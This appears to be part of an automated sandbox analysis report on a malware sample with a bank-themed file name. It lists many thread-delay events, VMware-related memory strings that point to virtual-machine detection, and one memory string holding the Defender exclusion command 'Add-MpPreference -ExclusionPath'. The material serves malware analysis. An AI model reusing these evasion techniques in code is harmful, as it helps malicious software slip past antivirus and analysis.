          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 697
          Source: C:\Windows\explorer.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 240000Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239857Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239734Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 31504Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239624Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239515Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239404Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239295Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239187Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239077Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238952Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238827Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238703Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238593Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238484Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238374Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238250Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238139Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238031Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237921Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237811Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237703Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237593Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237484Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237374Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237265Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237156Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237046Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236937Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236827Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236718Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236608Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236498Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236389Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236280Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236168Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236062Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235952Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235843Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235734Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235624Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235515Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235405Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235296Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235124Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235015Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 234905Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 234791Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 234664Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 234546Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 234406Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 234295Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 234156Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 233977Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 233856Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 233702Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 233590Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 233478Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 232547Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 231469Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 231347Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 231203Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 231052Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 230932Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 230801Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 230640Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Thread delayed: delay time: 230512
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Thread delayed: delay time: 230405
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Thread delayed: delay time: 230296
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Thread delayed: delay time: 230187
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Thread delayed: delay time: 230064
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Thread delayed: delay time: 229906
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Thread delayed: delay time: 229703
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Thread delayed: delay time: 229250
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Thread delayed: delay time: 229140
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Thread delayed: delay time: 229030
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Thread delayed: delay time: 228656
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Thread delayed: delay time: 223547
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Thread delayed: delay time: 223184
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Thread delayed: delay time: 223075
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: explorer.exe, 0000001C.00000000.545118083.0000000005F99000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q
          Source: explorer.exe, 0000000A.00000000.396953851.00000000083E0000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000001C.00000000.608135815.0000000005670000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000001C.00000003.562119015.00000000058E8000.00000004.00000001.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
          Source: explorer.exe, 0000001C.00000003.545714758.000000000602E000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000A.00000000.433884115.0000000008551000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BI>
          Source: explorer.exe, 0000000A.00000000.408944868.00000000062E0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001C.00000003.599662864.0000000010573000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}5C
          Source: explorer.exe, 0000001C.00000000.538460199.0000000000B3E000.00000004.00000020.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 0000001C.00000003.562379103.00000000059B3000.00000004.00000001.sdmp | Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\8fb~+
          Source: explorer.exe, 0000001C.00000003.591114501.0000000010556000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B%
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.383609954.00000000012BF000.00000004.00000020.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001C.00000003.562119015.00000000058E8000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_
          Source: explorer.exe, 0000001C.00000000.607740622.0000000004C00000.00000004.00000001.sdmp | Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: explorer.exe, 0000001C.00000003.561805870.000000000594D000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000001C.00000003.562379103.00000000059B3000.00000004.00000001.sdmp | Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001C.00000000.607740622.0000000004C00000.00000004.00000001.sdmp | Binary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000001C.00000003.593615957.0000000010433000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P
          Source: explorer.exe, 0000001C.00000003.591114501.0000000010556000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BF
          Source: explorer.exe, 0000001C.00000003.593615957.0000000010433000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Z
          Source: explorer.exe, 0000001C.00000003.604332920.0000000010433000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: explorer.exe, 0000001C.00000003.593615957.0000000010433000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 0000001C.00000003.591114501.0000000010556000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B>
          Source: explorer.exe, 0000001C.00000003.583702359.0000000010433000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}^
          Source: explorer.exe, 0000000A.00000000.455497902.000000000095C000.00000004.00000020.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 0000001C.00000003.591114501.0000000010556000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bv
          Source: explorer.exe, 0000001C.00000003.601187918.0000000005A0B000.00000004.00000001.sdmp | Binary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f563
          Source: explorer.exe, 0000001C.00000003.591114501.0000000010556000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bl
